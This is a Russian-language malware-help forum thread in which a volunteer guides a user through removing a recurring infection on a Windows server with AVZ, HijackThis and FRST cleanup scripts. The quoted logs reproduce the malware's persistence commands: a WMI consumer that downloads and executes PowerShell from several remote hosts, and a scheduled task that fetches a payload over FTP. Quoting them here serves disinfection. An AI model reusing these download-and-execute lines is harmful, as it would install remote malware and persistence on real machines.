Mysa 1, Mysa 2, ok, okaa вирус меняет DNS и закрывать 445, 139 порт

[ARDEV_AST]

Добрый день! На Windows Server 2008 появился вирус Mysa 1, Mysa 2, Ok, Okaa. Запускается через планировщик задач. Меняет первичный DNS на сетке и скачивает файл по FTP. Блокирует 445 и 139 порты через Брендмауэр. При удалении вирус появляется снова через 3 часа примерно либо сразу после перезагрузки сервера. Переустановка ОС на 2012 не помогло. Cureit и KVRT сканирует находит вирусы и лечит, однако вирус снова появляется через 3 часа. Другие антивирусы не устанавливаются. Браузер тоже не дает запустить. 

[Sandor]

Здравствуйте!

 

Прочтите и выполните Порядок оформления запроса о помощи

[ARDEV_AST]

3 часа назад, ARDEV_AST сказал:

Добрый день! На Windows Server 2008 появился вирус Mysa 1, Mysa 2, Ok, Okaa. Запускается через планировщик задач. Меняет первичный DNS на сетке и скачивает файл по FTP. Блокирует 445 и 139 порты через Брендмауэр. При удалении вирус появляется снова через 3 часа примерно либо сразу после перезагрузки сервера. Переустановка ОС на 2012 не помогло. Cureit и KVRT сканирует находит вирусы и лечит, однако вирус снова появляется через 3 часа. Другие антивирусы не устанавливаются. Браузер тоже не дает запустить. 

 

CollectionLog-2022.10.28-12.20.zip

[Sandor]

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Отключите на время лечения сервер от локальной сети.

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

begin
 TerminateProcessByName('C:\Windows\Inf\aspnet\lsma22.exe');
 TerminateProcessByName('c:\windows\system\msinfo.exe');
 TerminateProcessByName('c:\windows\temp\conhoy.exe');
 QuarantineFile('c:\windows\debug\item.dat', '');
 QuarantineFile('c:\windows\debug\ok.dat', '');
 QuarantineFile('C:\Windows\Inf\aspnet\lsma22.exe', '');
 QuarantineFile('c:\windows\system\msinfo.exe', '');
 QuarantineFile('C:\Windows\system32\csrs.exe', '');
 QuarantineFile('C:\Windows\syswow64\csrs.exe', '');
 QuarantineFile('c:\windows\temp\conhoy.exe', '');
 DeleteSchedulerTask('MicrosoftsWindowsy');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
 DeleteFile('c:\windows\debug\item.dat', '');
 DeleteFile('c:\windows\debug\item.dat', '64');
 DeleteFile('c:\windows\debug\ok.dat', '64');
 DeleteFile('C:\Windows\Inf\aspnet\lsma22.exe', '32');
 DeleteFile('c:\windows\inf\aspnet\lsma22.exe', '64');
 DeleteFile('c:\windows\system\msinfo.exe', '32');
 DeleteFile('C:\Windows\system32\csrs.exe', '');
 DeleteFile('C:\Windows\syswow64\csrs.exe', '');
 DeleteFile('c:\windows\temp\conhoy.exe', '');
 DeleteFile('c:\windows\temp\conhoy.exe', '64');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteRepair(9);
end.

 

Пожалуйста, перезагрузите компьютер вручную.

 

Закройте общие ресурсы:
 

Цитата

 

G:\DN

C:\Users

C:\Y

 

 

 

 

"Пофиксите" в HijackThis только это:

O25 - WMI Event: killmm4 - killmm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://155.94.235.39:8039/power.txt')"

 

 

 

Для повторной диагностики запустите снова AutoLogger. Прикрепите новый CollectionLog.

 

Остальные компьютеры в локальной сети тоже следует пролечить, например, с помощью KVRT.

Изменено 28 октября, 2022 пользователем Sandor

[ARDEV_AST]

[Sandor]

Это потому, что вы не читаете инструкции. Запускать нужно эту версию AVZ:

Цитата

G:\DN\PROJECT\AutoLogger\AutoLogger\AV\av_z.exe

 

[ARDEV_AST]

CollectionLog-2022.10.28-13.33.zip

[Sandor]

Дополнительно:

 

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

[Sandor]

59 минут назад, Sandor сказал:

Закройте общие ресурсы

Эти ресурсы по-прежнему открыты.

[ARDEV_AST]

Нужно закрыть общий доступ?

 

Addition.txt FRST.txt

[Sandor]

6 минут назад, ARDEV_AST сказал:

Нужно закрыть общий доступ?

Да, обязательно, по крайней мере на время лечения.

А также, повторю, обязательно пролечите остальные компьютеры в локальной сети.

 

 

• Отключите до перезагрузки антивирус.
• Выделите следующий код:

  Start::
  CloseProcesses:
  (services.exe ->) (Microl office) [Файл не подписан] C:\Windows\System\msinfo.exe
  (svchost.exe ->) (www.google.com) [Файл не подписан] C:\Windows\Inf\aspnet\lsma22.exe
  (winlogon.exe ->) () [Файл не подписан] C:\Windows\Temp\conhoy.exe <2>
  IFEO\uihost32.exe: [Debugger] ntsd -d
  IFEO\uihost64.exe: [Debugger] ntsd -d
  IFEO\vid001.exe: [Debugger] ntsd -d
  Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
  Task: {0E294A8E-7728-43A7-90BF-02C6C7F4518B} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ВНИМАНИЕ
  Task: {2A359626-624C-4AE5-9047-8578174BA8FF} - System32\Tasks\MicrosoftsWindowsy => c:\windows\temp\conhoy.exe [7680 2022-10-28] () [Файл не подписан] <==== ВНИМАНИЕ
  Task: {B014DEA5-1368-4AD4-BA65-F4AE0E48812E} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ВНИМАНИЕ
  Task: {E797E12A-39D5-4BB2-BC69-ED6EFDEBD750} - System32\Tasks\oka => c:\windows\inf\aspnet\lsma22.exe [1709568 2022-10-28] (www.google.com) [Файл не подписан]
  Task: {F52ACB45-234B-451C-816C-6027C02CA9D4} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ВНИМАНИЕ
  R2 xWinWpdSrv; c:\windows\system\msinfo.exe [7277056 2022-10-28] (Microl office) [Файл не подписан]
  2022-10-28 13:37 - 2022-10-28 13:37 - 000003450 _____ C:\Windows\system32\Tasks\Mysa1
  2022-10-28 13:37 - 2022-10-28 13:37 - 000003446 _____ C:\Windows\system32\Tasks\ok
  2022-10-28 13:37 - 2022-10-28 13:37 - 000003422 _____ C:\Windows\system32\Tasks\Mysa2
  2022-10-28 13:37 - 2022-10-28 13:37 - 000003344 _____ C:\Windows\system32\Tasks\oka
  2022-10-28 13:37 - 2022-10-28 13:37 - 000003332 _____ C:\Windows\system32\Tasks\MicrosoftsWindowsy
  2022-10-28 00:09 - 2022-10-28 00:09 - 006466100 _____ (Microsoft Corporation) C:\Windows\SysWOW64\csrs.exe
  WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"killmm4\"",Filter="__EventFilter.Name=\"killmm3\"::
  WMI:subscription\__EventFilter->killmm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
  WMI:subscription\CommandLineEventConsumer->killmm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http:/ (запись имеет ещё 362 символов).]
  2022-10-28 13:37 - 2022-10-28 13:37 - 004122624 _____ () [Файл не подписан] c:\windows\debug\item.dat
  FirewallRules: [{E73C64F9-DA37-4D1A-8665-E8649016BFAC}] => (Block) LPort=445
  FirewallRules: [{8709D4A8-BBF2-48E8-B13E-8D8CE5D3239E}] => (Block) LPort=139
  End::

   

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер перезагрузите вручную.

Подробнее читайте в этом руководстве.

[ARDEV_AST]

Обеденный перерыв у сотрудников закончился. Продолжу вечером. Спасибо за помощь. Вечером обязательно дам обратную связь.

[ARDEV_AST]

Fixlog.txt

 

В планировщике снова появилась эта зараза

[thyrex]

Пролечите компьютер при помощи Kaspersky Virus Removal Tools